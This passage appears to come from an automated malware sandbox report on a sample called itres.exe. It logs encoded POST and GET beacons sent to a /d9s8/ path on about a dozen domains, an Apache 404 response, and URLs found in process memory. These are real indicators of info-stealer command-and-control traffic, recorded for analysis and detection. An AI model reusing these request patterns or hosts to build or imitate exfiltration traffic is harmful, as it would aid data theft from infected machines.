2d 73 44 63 74 71 6f 55 39 6e 53 77 4e 34 69 7a 6c 70 30 76 69 35 42 54 36 35 5a 6f 55 71 33 31 70 47 54 70 6b 65 71 63 76 4c 61 51 51 66 34 43 51 32 45 56 74 6f 75 33 6a 46 50 5a 43 63 4d 35 31 4c 55 52 51 78 37 62 39 45 71 42 52 65 6c 4e 5f 4e 73 65 4a 63 31 4f 44 41 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 2de=IPZAFiYVXMXNzJqA3iZBs8N7n98XJc4T6kAl1kvvs7uVbwxbmH9DpS~XvRfpw_vRBCeLNHXpem6FbyqdY-1cLylTT8k7wqxMbepGm8TA5ynQH07IWkBOWKo7W3yZjagrfaDLoaaBKQt3~DxjUfBcT6qTDn0RqMU5mzfdLknFOna6bwbibZoSur276hDi98qSZVtRwsTdmpXazQnkjLhCoL16NRv_iGBe0d8-Zf6LPxdjNS2faoqjGp38IqN1MZiz(SsjG4yH(lrV0lHZZhuUQfYE~RHaSza42TMdHM(viWiRiP474icI63v-sDctqoU9nSwN4izlp0vi5BT65ZoUq31pGTpkeqcvLaQQf4CQ2EVtou3jFPZCcM51LURQx7b9EqBRelN_NseJc1ODAQ). Source: global traffic HTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.23works.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.23works.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.23works.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 65 3d 4e 33 4e 6e 6e 45 34 34 49 45 71 46 52 31 4f 6f 49 38 46 6d 79 79 76 56 52 4a 73 39 5a 46 67 48 61 67 31 75 36 56 50 30 53 34 72 39 30 2d 6a 31 58 61 49 41 47 66 72 32 55 4b 46 67 52 54 45 2d 48 72 6d 68 51 48 44 6c 39 39 64 36 58 65 43 7a 38 6c 62 55 4f 6f 4b 50 58 34 32 74 39 69 6e 73 49 4a 4e 4a 39 7a 4b 56 35 70 5a 49 76 63 77 41 6a 79 55 53 50 62 69 72 6a 6d 75 31 54 43 6c 6b 50 5a 4e 46 49 2d 36 56 70 68 39 33 71 75 72 4d 6c 58 64 36 57 51 66 67 71 69 76 56 6b 37 6b 66 62 44 35 36 58 49 6a 50 51 32 42 77 6d 50 66 64 67 70 51 5a 34 4a 56 76 66 33 70 50 50 43 59 58 35 73 78 61 7a 42 78 72 54 75 48 55 37 6d 53 46 65 49 4e 49 32 5f 48 72 49 78 66 58 6b 36 6c 42 77 46 49 4e 61 4c 6e 62 55 6b 69 71 28 35 30 79 65 35 4d 46 70 49 64 46 58 32 72 44 39 79 47 4c 4b 37 6a 31 4b 70 6c 4d 53 61 36 44 54 63 37 71 73 54 61 37 79 35 33 42 6f 56 79 71 6a 4f 44 4f 54 71 54 4d 54 47 6a 50 77 39 6f 54 78 50 44 67 4c 79 74 37 68 74 4e 67 78 43 71 67 59 70 63 78 7a 58 51 41 6d 74 6e 53 75 46 4b 59 36 30 6a 39 37 38 46 51 37 5f 35 5f 7e 56 42 78 47 58 6e 32 44 38 5a 58 7e 41 28 51 7a 5f 71 67 4e 6a 7e 37 69 33 4a 56 43 67 71 76 48 51 55 62 6a 34 42 47 67 55 51 75 49 6f 45 31 74 51 39 42 58 64 61 49 7a 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 2de=N3NnnE44IEqFR1OoI8FmyyvVRJs9ZFgHag1u6VP0S4r90-j1XaIAGfr2UKFgRTE-HrmhQHDl99d6XeCz8lbUOoKPX42t9insIJNJ9zKV5pZIvcwAjyUSPbirjmu1TClkPZNFI-6Vph93qurMlXd6WQfgqivVk7kfbD56XIjPQ2BwmPfdgpQZ4JVvf3pPPCYX5sxazBxrTuHU7mSFeINI2_HrIxfXk6lBwFINaLnbUkiq(50ye5MFpIdFX2rD9yGLK7j1KplMSa6DTc7qsTa7y53BoVyqjODOTqTMTGjPw9oTxPDgLyt7htNgxCqgYpcxzXQAmtnSuFKY60j978FQ7_5_~VBxGXn2D8ZX~A(Qz_qgNj~7i3JVCgqvHQUbj4BGgUQuIoE1tQ9BXdaIzw). Source: global traffic HTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.nittayabeauty.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.nittayabeauty.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nittayabeauty.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 65 3d 72 77 74 70 4a 5a 31 6c 70 58 58 6a 44 67 56 49 33 4f 34 61 77 72 37 6c 49 5f 51 57 79 61 33 31 6f 50 33 48 50 65 65 69 47 75 6e 75 62 41 79 68 48 33 4e 6a 70 66 6d 43 67 56 4e 31 56 61 35 7a 64 51 4a 67 28 4b 65 32 64 34 4a 72 61 75 77 61 57 36 62 47 45 68 7a 4e 31 37 64 76 5a 36 33 6c 7a 4c 35 6c 55 72 43 4c 56 4a 32 59 28 67 51 48 78 6f 34 70 4e 52 30 57 37 63 44 7a 47 75 45 61 61 39 47 31 4e 2d 45 36 75 5f 6a 45 6b 32 6f 38 36 73 61 7a 39 66 43 35 58 36 51 5a 4e 36 4e 30 6a 34 71 4d 45 50 41 44 58 36 4b 77 58 33 55 67 32 30 6d 35 56 56 70 65 64 51 6b 36 48 64 6a 70 4b 6e 4d 4e 38 41 58 75 66 39 47 6f 61 4c 67 68 57 65 50 48 78 41 55 77 7a 78 42 63 6b 4c 45 37 30 56 76 47 41 77 28 50 38 49 67 2d 70 4b 70 7a 47 4c 4d 33 53 48 61 49 31 55 71 41 6f 32 36 6c 44 53 6f 52 36 6d 36 57 69 59 6a 70 71 59 6f 42 39 54 48 6d 4d 2d 38 6b 43 44 65 41 6c 4e 55 74 54 78 61 46 4e 50 72 5a 7e 72 66 4d 31 46 41 5f 41 42 4e 6a 28 43 32 6e 7a 37 34 71 76 62 50 5f 51 31 41 4f 4f 77 57 46 4f 33 4c 51 6f 31 35 46 54 37 77 58 32 50 51 79 67 2d 4e 50 64 73 7e 4b 39 53 65 69 77 48 54 2d 28 51 4d 34 51 6b 75 6a 34 6e 6e 4a 53 77 4f 66 4d 61 6b 30 33 44 76 6b 37 73 66 32 55 47 6d 47 54 75 74 7a 39 4c 30 74 79 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 2de=rwtpJZ1lpXXjDgVI3O4awr7lI_QWya31oP3HPeeiGunubAyhH3NjpfmCgVN1Va5zdQJg(Ke2d4JrauwaW6bGEhzN17dvZ63lzL5lUrCLVJ2Y(gQHxo4pNR0W7cDzGuEaa9G1N-E6u_jEk2o86saz9fC5X6QZN6N0j4qMEPADX6KwX3Ug20m5VVpedQk6HdjpKnMN8AXuf9GoaLghWePHxAUwzxBckLE70VvGAw(P8Ig-pKpzGLM3SHaI1UqAo26lDSoR6m6WiYjpqYoB9THmM-8kCDeAlNUtTxaFNPrZ~rfM1FA_ABNj(C2nz74qvbP_Q1AOOwWFO3LQo15FT7wX2PQyg-NPds~K9SeiwHT-(QM4Qkuj4nnJSwOfMak03Dvk7sf2UGmGTutz9L0tyQ). Source: global traffic HTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.keebcat.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.keebcat.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.keebcat.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 65 3d 54 4d 41 68 30 41 6f 5f 46 75 46 5a 46 70 59 77 42 63 76 61 57 4b 65 46 6c 59 4a 53 53 30 79 42 4d 71 70 56 28 6a 38 47 65 4c 76 77 4f 6f 5a 56 43 56 76 34 73 38 64 48 7e 71 50 44 39 71 57 47 4e 31 56 45 73 77 54 4b 37 57 6a 37 46 36 7a 67 42 5f 56 73 6a 73 6b 5f 31 62 44 74 34 45 74 45 4b 42 4f 5a 54 38 5a 30 47 62 31 6f 4e 34 69 6d 78 32 76 36 66 58 33 38 67 57 75 4c 47 33 44 4c 6b 42 56 50 34 5f 78 61 46 30 31 59 6f 58 45 34 66 77 28 52 43 50 46 45 32 32 38 53 6a 2d 41 41 49 33 35 65 4a 71 69 51 73 50 32 6d 4e 47 42 44 71 4d 7e 58 56 64 59 43 47 47 69 69 54 57 44 4c 67 5a 31 55 4c 62 67 71 78 6a 43 6f 7e 73 48 58 6a 57 66 62 39 4e 78 4c 78 70 38 76 73 6a 77 4a 49 49 66 6f 48 34 72 38 48 4b 46 74 55 6e 31 5f 59 30 6f 4e 37 6c 4b 41 70 47 70 48 4e 70 4c 6d 7e 41 6d 32 36 39 6c 76 32 67 34 74 70 5f 50 39 72 45 42 70 61 50 48 47 64 37 4c 42 6e 65 74 59 6e 63 53 6c 68 4a 43 43 76 74 43 6d 35 31 42 67 62 41 79 44 58 45 7a 47 33 72 71 33 7e 31 6f 59 57 7a 6d 6b 48 65 30 56 6c 6d 76 69 59 52 47 57 62 2d 43 4e 66 43 6e 49 70 70 28 4b 55 31 64 43 59 6e 34 34 4c 53 50 5a 74 6a 66 6d 4b 77 50 44 49 42 67 74 6e 73 34 6c 47 6d 43 38 4d 32 7a 4f 52 4e 64 33 30 75 73 61 71 36 78 55 74 74 73 31 75 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 2de=TMAh0Ao_FuFZFpYwBcvaWKeFlYJSS0yBMqpV(j8GeLvwOoZVCVv4s8dH~qPD9qWGN1VEswTK7Wj7F6zgB_Vsjsk_1bDt4EtEKBOZT8Z0Gb1oN4imx2v6fX38gWuLG3DLkBVP4_xaF01YoXE4fw(RCPFE228Sj-AAI35eJqiQsP2mNGBDqM~XVdYCGGiiTWDLgZ1ULbgqxjCo~sHXjWfb9NxLxp8vsjwJIIfoH4r8HKFtUn1_Y0oN7lKApGpHNpLm~Am269lv2g4tp_P9rEBpaPHGd7LBnetYncSlhJCCvtCm51BgbAyDXEzG3rq3~1oYWzmkHe0VlmviYRGWb-CNfCnIpp(KU1dCYn44LSPZtjfmKwPDIBgtns4lGmC8M2zORNd30usaq6xUtts1uw). Source: global traffic HTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.ashleygrady.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.ashleygrady.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ashleygrady.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 65 3d 35 7a 46 62 64 32 4b 48 67 36 74 6c 62 34 70 42 56 4d 44 33 46 4c 6a 34 4d 6d 76 79 4d 73 37 66 59 62 78 71 44 5a 7e 74 32 4e 7e 56 6f 51 33 42 6c 58 33 38 69 7a 69 66 61 77 43 62 28 70 4e 59 61 35 30 66 30 6e 35 73 7e 69 42 34 30 5f 33 56 65 78 63 67 36 56 43 36 49 59 59 2d 69 5f 6b 4f 78 62 56 6b 43 6f 7a 45 55 35 73 70 51 6d 48 68 57 52 34 72 6d 52 6f 66 38 68 6c 73 34 45 61 6a 6f 48 42 78 4f 36 6b 6f 55 38 4d 74 52 6e 52 4d 76 59 52 47 75 42 52 78 58 2d 73 45 45 6c 67 53 68 62 41 52 39 77 4d 4b 5a 33 33 4d 56 52 35 70 46 6b 54 46 6b 38 53 61 33 53 63 36 49 67 70 43 71 69 35 65 65 54 56 2d 69 34 51 69 62 5a 4a 7a 78 4b 55 79 55 42 41 64 36 52 37 6b 48 75 37 6f 59 77 35 53 5a 6f 4c 48 43 72 70 36 67 73 72 56 67 49 67 76 69 69 4b 58 4d 4c 73 34 54 35 46 50 32 50 42 39 32 72 74 4b 4e 42 62 31 7e 42 4a 66 61 46 28 6b 41 74 43 59 36 6d 31 4f 56 4f 31 4e 61 42 33 48 6b 48 49 70 38 52 57 5a 58 30 67 51 36 56 48 4c 71 6f 32 61 51 76 42 77 30 76 58 75 76 76 69 6e 36 78 42 52 59 45 75 37 41 6d 52 46 31 62 72 51 68 6e 47 36 75 31 46 43 66 77 73 5a 4c 31 5a 75 4a 75 48 44 73 35 54 55 4c 37 30 4e 77 44 4e 48 57 55 52 5f 6b 33 7e 77 28 5a 54 57 64 41 7e 62 31 72 4d 61 43 79 74 6c 30 37 51 62 6e 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 2de=5zFbd2KHg6tlb4pBVMD3FLj4MmvyMs7fYbxqDZ~t2N~VoQ3BlX38izifawCb(pNYa50f0n5s~iB40_3Vexcg6VC6IYY-i_kOxbVkCozEU5spQmHhWR4rmRof8hls4EajoHBxO6koU8MtRnRMvYRGuBRxX-sEElgShbAR9wMKZ33MVR5pFkTFk8Sa3Sc6IgpCqi5eeTV-i4QibZJzxKUyUBAd6R7kHu7oYw5SZoLHCrp6gsrVgIgviiKXMLs4T5FP2PB92rtKNBb1~BJfaF(kAtCY6m1OVO1NaB3HkHIp8RWZX0gQ6VHLqo2aQvBw0vXuvvin6xBRYEu7AmRF1brQhnG6u1FCfwsZL1ZuJuHDs5TUL70NwDNHWUR_k3~w(ZTWdA~b1rMaCytl07Qbng). Source: global traffic HTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.clicrhonealpes.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.clicrhonealpes.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.clicrhonealpes.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 65 3d 53 34 64 2d 58 57 65 72 4a 79 4e 59 71 63 39 53 72 34 59 45 39 4d 52 6e 74 39 41 55 50 6b 62 4c 72 45 41 75 7e 76 4c 57 34 67 61 6a 35 59 49 55 47 47 58 6d 6b 74 4f 6c 52 76 72 4d 48 72 7a 35 42 78 39 47 41 79 58 5f 39 61 44 31 54 35 4b 75 30 7a 65 66 7a 46 6b 4f 67 68 6d 78 69 4c 39 2d 58 67 68 33 53 6d 30 62 74 55 67 79 45 65 31 65 6e 43 45 71 4a 37 75 75 6b 70 44 72 68 45 50 74 65 68 77 6c 75 39 37 4d 6b 57 59 34 64 31 4e 6e 45 4b 55 5f 59 6c 55 63 49 65 35 46 70 6a 56 45 73 30 56 4c 6b 36 6d 56 61 41 74 5a 69 76 44 5f 67 77 64 6b 4a 5a 6e 68 61 58 4e 4b 41 4b 4c 78 68 4f 4e 59 54 57 6e 67 54 52 79 49 32 51 72 76 4a 41 6c 5a 73 63 79 75 44 51 4d 5a 4c 4e 53 61 32 4e 41 43 36 6f 6f 63 51 2d 39 54 54 7a 39 6c 69 6a 33 32 65 46 55 4c 62 6c 69 53 43 31 58 56 37 6d 34 55 6c 5a 30 2d 36 76 6d 65 62 74 7a 48 47 5f 55 44 73 55 63 59 4d 68 4b 46 53 52 4f 52 70 43 73 6b 6e 66 67 6f 54 6c 30 64 55 57 4d 61 62 65 7e 43 36 5f 67 7a 74 30 28 34 62 68 72 65 66 31 67 36 79 4e 61 6b 54 4d 4f 36 4c 37 37 37 52 58 51 34 6d 43 46 75 77 70 41 4e 7a 53 6d 64 6b 49 56 75 48 43 28 79 57 31 31 41 45 56 30 70 79 33 53 51 67 46 77 44 4e 43 6f 68 71 58 66 6f 61 55 56 4e 71 36 78 52 6e 50 69 63 61 37 6a 6b 6a 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 2de=S4d-XWerJyNYqc9Sr4YE9MRnt9AUPkbLrEAu~vLW4gaj5YIUGGXmktOlRvrMHrz5Bx9GAyX_9aD1T5Ku0zefzFkOghmxiL9-Xgh3Sm0btUgyEe1enCEqJ7uukpDrhEPtehwlu97MkWY4d1NnEKU_YlUcIe5FpjVEs0VLk6mVaAtZivD_gwdkJZnhaXNKAKLxhONYTWngTRyI2QrvJAlZscyuDQMZLNSa2NAC6oocQ-9TTz9lij32eFULbliSC1XV7m4UlZ0-6vmebtzHG_UDsUcYMhKFSRORpCsknfgoTl0dUWMabe~C6_gzt0(4bhref1g6yNakTMO6L777RXQ4mCFuwpANzSmdkIVuHC(yW11AEV0py3SQgFwDNCohqXfoaUVNq6xRnPica7jkjw).
 Source: global traffic HTTP traffic detected: GET /d9s8/?2de=0JLOdGg1pxN6Gt1Bi/JSJ+sGVc5LpPYI1jRUQtJxPcLLDPheB182/GB7jVB+9emH0R5P&2dGH_=lhdDpBZXt0P HTTP/1.1Host: www.brasserie-lafayette.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /d9s8/?2de=dLiHs7tqNZzpikHCi85ytJ6zSazBJfKYHrDOt6j0CIH249LGHEOsf8+JajlTyMmOo22K&2dGH_=lhdDpBZXt0P HTTP/1.1Host: www.isabellelinhnguyen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /d9s8/?2de=3ubZ5tRrxIfN41eqqpIj22VrlW9j75JM4xICI34kih2i+rqjsIMd825CVukfAvIDWxA7&2dGH_=lhdDpBZXt0P HTTP/1.1Host: www.smalltownlawns.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /d9s8/?2de=06wv+NhoHjlhWQUEJX2w+vK/IFNJKXsiSbpyW5561s6/I+0VZrqwpkfEjA0pYsAdDrMj&2dGH_=lhdDpBZXt0P HTTP/1.1Host: www.thebardi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /d9s8/?2de=/wmggT2FDua6/uf0m8vYUW9XM6JdOK3pq1DkZ95mxMYTiU7Z21xlQY1juaca7pTz06oP&2dGH_=lhdDpBZXt0P HTTP/1.1Host: www.connerparty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /d9s8/?2de=HNt6bE8MfKrAhK/pt1sF0411gOBLJ9Uo/gJYn3fY8ue0UhpQnU4ulW+T1HyKj92Df3q0&2dGH_=lhdDpBZXt0P HTTP/1.1Host: www.nola3d.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /d9s8/?2de=C15d5iwTKlKsI3rAXZsLwlTuGsAeQEM+ckQv/EOsC4DDktzSY592Fv+KLrtwSAQYGPi+&2dGH_=lhdDpBZXt0P HTTP/1.1Host: www.23works.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /d9s8/?2de=kyZTX99LiW/icy84gI8HitXVOdgKxOvA9fmCXsGAN7TtQxOyGGUpuanA939oWYtlCk9w&2dGH_=lhdDpBZXt0P HTTP/1.1Host: www.nittayabeauty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /d9s8/?2de=cO0bqnodE8Uodepscc2XXc+fybp4dBOkcNItlx0mXpHFPbxkNxOWsoUK9bPA0ZyiUQJd&2dGH_=lhdDpBZXt0P HTTP/1.1Host: www.keebcat.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /d9s8/?2de=2xxhDTKogYVwMqkKCpG9QsOba3/Ca+nzIrlpYJOr5IqlgQrpv0G7wV/gFR/144BWYfki&2dGH_=lhdDpBZXt0P HTTP/1.1Host: www.ashleygrady.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /d9s8/?2de=d6pEJxSdPSBH0MIO1uNgncpVh40baHTR/jhPmc3N2xeTp5EUHVGtu5D3SsniCJrPBB9M&2dGH_=lhdDpBZXt0P HTTP/1.1Host: www.clicrhonealpes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Performs DNS lookups Show sources
 Source: unknown DNS traffic detected: queries for: www.brasserie-lafayette.com
 Posts data to webserver Show sources
 Source: unknown HTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.isabellelinhnguyen.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.isabellelinhnguyen.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.isabellelinhnguyen.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 65 3d 53 4a 57 39 79 63 68 50 49 70 71 57 39 54 43 4c 38 4a 68 72 73 4e 48 57 65 50 58 66 50 50 4b 63 56 75 57 36 28 4b 7a 58 4d 4e 66 58 35 75 54 64 4e 33 28 4c 56 5a 57 49 4a 51 46 44 31 66 44 65 7e 6d 47 64 77 41 4c 75 55 37 34 51 6b 46 56 70 56 4c 53 73 53 76 68 32 42 55 44 35 77 66 47 6e 4c 63 36 62 74 54 74 72 44 66 76 32 78 43 43 68 73 54 32 33 74 52 62 6a 72 42 28 6e 4c 46 6d 52 49 43 58 77 54 39 5a 78 66 34 47 4a 4e 57 30 47 4a 6b 77 39 41 48 48 73 74 62 59 35 65 58 4f 33 51 42 31 55 62 73 66 6f 76 34 30 74 62 5f 64 52 43 5a 4b 38 68 62 4b 32 6c 6a 28 2d 6e 44 71 35 47 73 4f 41 52 38 69 54 58 4d 6d 75 6f 51 52 7a 33 54 6f 4b 50 76 57 53 72 6c 5a 7a 42 52 79 76 55 55 79 30 68 52 4e 58 77 30 4f 4d 46 33 57 76 68 44 6c 6f 35 77 6e 61 55 56 62 71 43 6b 47 4a 6f 6d 39 56 4a 73 64 4a 6e 59 5a 53 49 70 42 6b 7a 43 58 48 47 49 67 64 37 45 79 57 33 51 75 4d 7e 6d 6d 50 4a 52 54 6f 4e 51 34 6e 4a 6c 6f 55 63 78 6d 7a 7a 65 55 48 37 56 6f 70 68 57 39 4a 74 45 6f 4e 62 76 46 4e 53 6a 56 6d 53 44 4c 38 75 38 61 73 6c 50 30 6d 6f 4c 45 69 65 45 49 75 62 54 78 42 49 71 41 77 64 53 34 49 43 50 48 53 58 43 44 34 53 52 74 6a 67 75 70 6e 64 59 78 7a 37 67 6f 56 4f 78 56 71 67 76 77 32 66 65 7a 6a 78 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 2de=SJW9ychPIpqW9TCL8JhrsNHWePXfPPKcVuW6(KzXMNfX5uTdN3(LVZWIJQFD1fDe~mGdwALuU74QkFVpVLSsSvh2BUD5wfGnLc6btTtrDfv2xCChsT23tRbjrB(nLFmRICXwT9Zxf4GJNW0GJkw9AHHstbY5eXO3QB1Ubsfov40tb_dRCZK8hbK2lj(-nDq5GsOAR8iTXMmuoQRz3ToKPvWSrlZzBRyvUUy0hRNXw0OMF3WvhDlo5wnaUVbqCkGJom9VJsdJnYZSIpBkzCXHGIgd7EyW3QuM~mmPJRToNQ4nJloUcxmzzeUH7VophW9JtEoNbvFNSjVmSDL8u8aslP0moLEieEIubTxBIqAwdS4ICPHSXCD4SRtjgupndYxz7goVOxVqgvw2fezjxw).
 Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Sep 2020 09:01:24 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeAccept-Ranges: bytesVary: Accept-Encoding,User-AgentContent-Encoding: gzipContent-Length: 857Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 55 df 8f e3 34 10 7e ef 5f 31 e7 13 82 93 9a 6d 92 6d 77 4b 36 a9 84 80 83 93 d0 71 12 f0 c0 a3 9b 4c 1a b3 ae 1d 6c a7 3f ee c4 ff ce d8 4e b6 ed 71 0f 68 a5 75 3c 9e f9 e6 9b cf 33 6e f9 ea 87 5f bf ff fd cf 0f 3f 42 e7 f6 72 33 2b a7 05 79 43 8b 13 4e e2 e6 ad 90 08 ef b5 83 b7 7a 50 4d b9 88 d6 59 b9 47 c7 29 ce f5 09 fe 3d 88 43 c5 6a ad 1c 2a 97 b8 73 8f 0c c6 5d c5 1c 9e dc c2 03 3f 41 dd 71 63 d1 55 83 6b 93 35 83 09 44 f1 3d 56 ec 20 f0 d8 6b e3 ae 42 8f a2 71 5d d5 e0 41 d4 98 84 cd 1c 84 12 4e 70 99 d8 9a 4b ac b2 bb 94 11 8c 75 67 22 e9 13 8f f9 6a 6b c9 be d5 cd 19 3e cd 00 b6 bc 7e de 19 cf 3f a9 b5 d4 a6 80 d7 88 f8 34 fb 67 16 7c e6 d0 65 73 e8 83 6b 4b c9 93 96 ef 85 3c 17 c0 7e 46 79 40 27 6a 0e ef 71 40 36 07 f6 1b ee 34 c2 1f ef e8 3b 7c ce e1 c5 67 0e df 19 a2 46 4e bf 0c b5 68 38 fc 64 b8 6a 7c 94 e5 ca 26 16 8d 68 9f a6 14 47 14 bb ce 15 a0 b4 d9 73 e9 cd 7b 6e 76 42 15 90 fa 4d cf 9b 46 a8 dd b8 f3 35 25 5c 8a 1d 1d d7 24 0d 9a c0 fd ce 2b c5 85 42 13 a8 47 80 44 62 4b b8 c0 07 a7 2f b0 89 89 e9 3e 37 3b dd 17 90 3d 3e f6 a7 68 3c 45 9d c9 96 3d a6 d1 38 52 99 10 b2 d5 ad 39 a6 8b 56 cf c9 e8 63 b1 c5 56 1b 92 26 6c 78 eb 46 82 8d b0 bd e4 a4 ab e3 5b 89 1e 64 bc 6a 52 1a d8 54 92 4c f6 4d f2 10 02 46 2e ab f4 ab 9b c3 7e b0 5d 72 ff df 9a f3 55 f4 eb b2 cb 55 5a f1 11 0b 58 ae 23 e9 1b e9 ef d3 f4 46 77 fa cb a9 66 2f b9 4f 26 69 0a 3e c7 c9 b3 2f e0 e4 d7 38 c9 56 3b a7 f7 45 80 0a 40 fd 15 d1 98 25 9b 8e 78 38 9a 5a f2 3e 5f e7 f8 f0 72 df 0d d6 da 70 27 b4 f2 5d a2 42 bb 96 8b d0 ea d4 f2 8b 38 a4 b3 d2 37 30 ed 1b 71 80 5a 72 6b e3 20 c6 ae 08 38 b1 61 18 88 a6 62 68 8c 36 34 19 00 a5 3d ec a0 0b 15 54 2c 4b 53 16 c5 8e df de 81 5c 7a 2d cf 3b ad a0 d7 42 39 02 5e a5 f3 7c 45 dd 32 5f a7 b0 ce e9 3f 03 eb 8c 7e c6 44 52 ba bf c8 ab 62 61 ca bc 9d 68 56 ac 15 52 16 81 7c 74 2c 5e b7 ed 9a 93 5e 63 5c bc 60 7a 0b 16 63 4a cf 18 4e 15 5b e6 0c ce 15 7b 5c 32 f0 18 15 1b 03 d9 f5 80 56 ec 32 58 ec fa 4e 2a f6 ed 8b ab bf 38 8f d7 9f d8 e6 15 3d 5f 94 20 d4 bf 20 01 e8 e3 5a 38 ea d6 a9 f4 1b 39 43 d3 65 f9 78 76 7b ba 27 a5 13 41 92 47 b1 8f dc 28 9a 0a b6 29 6d cf d5 e4 34 9c 82 47 5c 68 90 91 9e b9 0d 31 20 17 5a 08 6d 42 26 ec 2e 8b 4f ae a2 27 b7 f5 62 c2 37 cb 74 09 e1 e6 de d0 b5 67 23 c3 29 ec f2 f1 7f 2b 79 80 9b 39 ba 94 d5 4f 8e be f5 d9 e6 5d 0b 67 3d 80 eb 84 7a 86 63 c7 9d df 7e 6d 10 a4 d6 cf 54 24 d1 33 60 3b 3d c8 06 b6 48 cd e4 47 be a7 58 8b 61 b0 79 ed 28 18 c1 0a 87 a0 8f d4 90 77 e5 a2 ff 32 fd 71 a1 75 ec e7 45 fc 2d fa 17 8e 62 90 ec a3 06 00 00 Data Ascii: U4~_1mmwK6qLl?Nqhu<3n_?Br3+yCNzPMYG)=Cj*s]?AqcUk5D=
 Urls found in memory or binary data Show sources
 Source: itres.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0 Source: itres.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0 Source: itres.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P Source: itres.exe String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02 Source: itres.exe String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0: Source: itres.exe String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0 Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/kwbg.jpg) Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/libg.png) Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/search-icon.png) Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.2 Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/arrow.png) Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/bodybg.png) Source: systray.exe, 